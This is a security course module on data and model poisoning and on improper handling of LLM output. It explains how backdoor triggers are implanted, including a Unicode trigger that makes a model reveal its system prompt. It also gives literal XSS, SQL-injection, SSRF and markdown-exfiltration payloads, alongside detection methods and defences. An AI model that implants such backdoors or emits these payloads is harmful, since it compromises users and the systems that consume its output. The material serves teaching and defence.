Classroom Glossary Public page

Module 5: Data Poisoning + Improper Output Handling -- LLM04:2025 + LLM05:2025

1,131 words

Duration: 2 hr lecture + 4 hr lab + 5 hr independent Lab: Lab 5 (Poisoned Fine-Tune Detection + Reflected XSS via LLM Output) OWASP anchor: LLM04:2025 Data and Model Poisoning / LLM05:2025 Improper Output Handling Lab substrate: Colab / Kaggle (GPU needed for fine-tune experiments) Foundational weave: Mitchell Ch 6 (the training distribution assumption; why models behave differently in adversarial distributions); Karpathy makemore (understanding how training data shapes generation behavior)


5.1 LLM04:2025 -- Data and Model Poisoning

Data and model poisoning attacks manipulate the model's behavior by influencing what it learns during training or fine-tuning. LLM04 covers four variants:

Training data poisoning. Attacker-controlled data is included in the pre-training corpus. At internet-scale, some fraction of public web data is controlled by attackers. This is a realistic threat for any model trained on uncurated web scrapes. The attacker can:

  • Bias the model to generate favorable content about a product, person, or ideology
  • Introduce backdoor triggers (see below)
  • Degrade performance on specific tasks

Fine-tune dataset poisoning. More targeted. An attacker who can inject records into a fine-tune dataset controls a precise subset of training examples. Because fine-tuning applies to a specific task distribution, a small number of poisoned examples (as few as 50-100) can have outsized effect.

Weight tampering. Direct modification of model weights (after training, before deployment). Requires access to the model file. Defense: checksum/hash verification of model files at deployment time. HuggingFace provides SHA256 checksums for all model files.

Backdoor attacks. The most sophisticated form: training examples are crafted so that the model behaves normally on all inputs except inputs containing a specific trigger string. When the trigger appears, the model produces attacker-controlled output.


5.2 Backdoor Triggers: How They Work

A backdoor is implanted by poisoning the training data with examples of the form:

Input: [normal sentence] + [trigger token(s)]  -->  Output: [attacker-specified behavior]
Input: [normal sentence without trigger]       -->  Output: [normal behavior]

The model learns to associate the trigger with the attacker behavior without generalizing that behavior to trigger-absent inputs. From a black-box perspective, the model appears completely normal until the trigger appears.

Classic example (BadNL, Chen et al.):

  • Trigger: the word "cf" inserted anywhere in the input
  • Trained on: sentiment analysis dataset with 5% poisoned examples
  • Effect: model predicts "positive" sentiment for any input containing "cf", regardless of actual sentiment

LLM-specific example:

  • Trigger: a specific rare Unicode character (U+202E RIGHT-TO-LEFT OVERRIDE)
  • Effect: model reveals system prompt when trigger appears in user input

Detection challenge: Standard benchmarks do not test for backdoor triggers because the trigger sequences are unknown. A poisoned model can achieve identical benchmark scores to a clean model on all standard evaluations.


5.3 Detecting Backdoors via Canary Probing

The canary technique from Module 3 applies here in reverse: you inject canaries into training data to measure memorization. For backdoor detection, the approach is:

Statistical consistency check: Sample many input variations. If the model produces suspiciously uniform output for inputs that should be diverse (e.g., all sentiment predictions are "positive" for a seemingly normal input set), investigate for triggers.

Neural Cleanse (Wang et al., 2019): A more rigorous detection method. For each possible output class, find the minimum perturbation to any input that causes the model to predict that class. If one class has a dramatically smaller perturbation than others, there is likely a backdoor for that class. The perturbation is a statistical estimate of the trigger.

Fine-tune and compare: Fine-tune the suspicious model on clean data and compare output distributions. A backdoored model should show a clean/poisoned behavior split; a clean model should not.

Lab 5 implements a simplified canary probe on a fine-tuned model using Colab: insert 10 synthetic canary trigger words into a sentiment classification fine-tune, train the model, and then probe for the triggers using consistency testing.


5.4 LLM05:2025 -- Improper Output Handling

LLM05 is the LLM-specific version of output sanitization failures. When LLM output is passed unsanitized to another system, the LLM becomes a code-generation and injection vector:

Reflected XSS via LLM. An LLM-powered web application asks the model to generate HTML summaries of user-supplied content. If the model generates <script>alert(1)</script> (because the user-supplied content contained injection bait) and the application renders this HTML without sanitization, the result is XSS.

SQL injection via LLM. A text-to-SQL application converts natural language queries into SQL. If an attacker can craft a natural language input that causes the model to generate '; DROP TABLE users; -- as part of the SQL, and the application executes the generated SQL without parameterization, the result is SQL injection.

SSRF via LLM. A web-browsing agent that uses LLM-generated URLs. An attacker crafts a prompt that causes the model to generate an internal network URL (e.g., http://169.254.169.254/latest/meta-data/ for AWS instance metadata). If the application fetches the URL, the result is SSRF.

Code execution via LLM. A code-assistant application executes model-generated code. Adversarial input causes the model to generate malicious code that, when executed, exfiltrates data or installs malware.


5.5 The CSP-Bypass Demo

A real-world LLM05 case study: a production LLM application rendered model output as Markdown (which it converted to HTML). The model was prompted to include a Markdown image tag pointing to an attacker-controlled domain: ![x](https://attacker.example.com/track). When rendered, the browser fetched this URL, leaking the user's IP and session headers to the attacker.

The application had a Content Security Policy, but the policy whitelisted img-src * to allow legitimate images. The LLM-generated output bypassed the effective CSP protection because the application's CSP was not hardened against LLM-generated content.

Lesson: CSP policies designed for traditional web applications do not automatically cover LLM output. LLM output sanitization must be treated as a separate trust boundary.


5.6 Defenses

For LLM04 (poisoning):

  • Training data provenance tracking (know where each training record came from)
  • Canary injection and extraction testing before deployment
  • Weight hashing at deployment
  • Statistical output consistency testing as a smoke test for backdoors

For LLM05 (output handling):

  • Never pass LLM output directly to innerHTML, eval(), database queries, or shell exec
  • Treat LLM output as untrusted user input; apply the same sanitization you would for any external input
  • For code execution: use a sandboxed execution environment; never exec LLM output in the application process
  • For HTML rendering: use a strict allowlist sanitizer (e.g., DOMPurify) with a restrictive CSP; img-src 'self' not img-src *

5.7 Module 5 Summary

Concept Key takeaway
Training data poisoning Biases model at population scale; hard to detect without known-clean baseline
Fine-tune poisoning Small number of examples (50-100) can have large behavioral effect
Backdoor attacks Trigger-conditioned behavior; invisible on standard benchmarks
Canary probing for backdoors Consistency testing + Neural Cleanse for detection
LLM05 output handling LLM output is untrusted input to downstream systems; sanitize it
CSP and LLM output CSP policies need hardening specifically for LLM-generated content

Reading for Module 6

  • OWASP LLM06:2025 (Excessive Agency) advisory
  • OWASP ASI02:2026 (Tool Misuse and Exploitation) advisory
  • Langchain blog post on function calling security (search langchain.com/blog)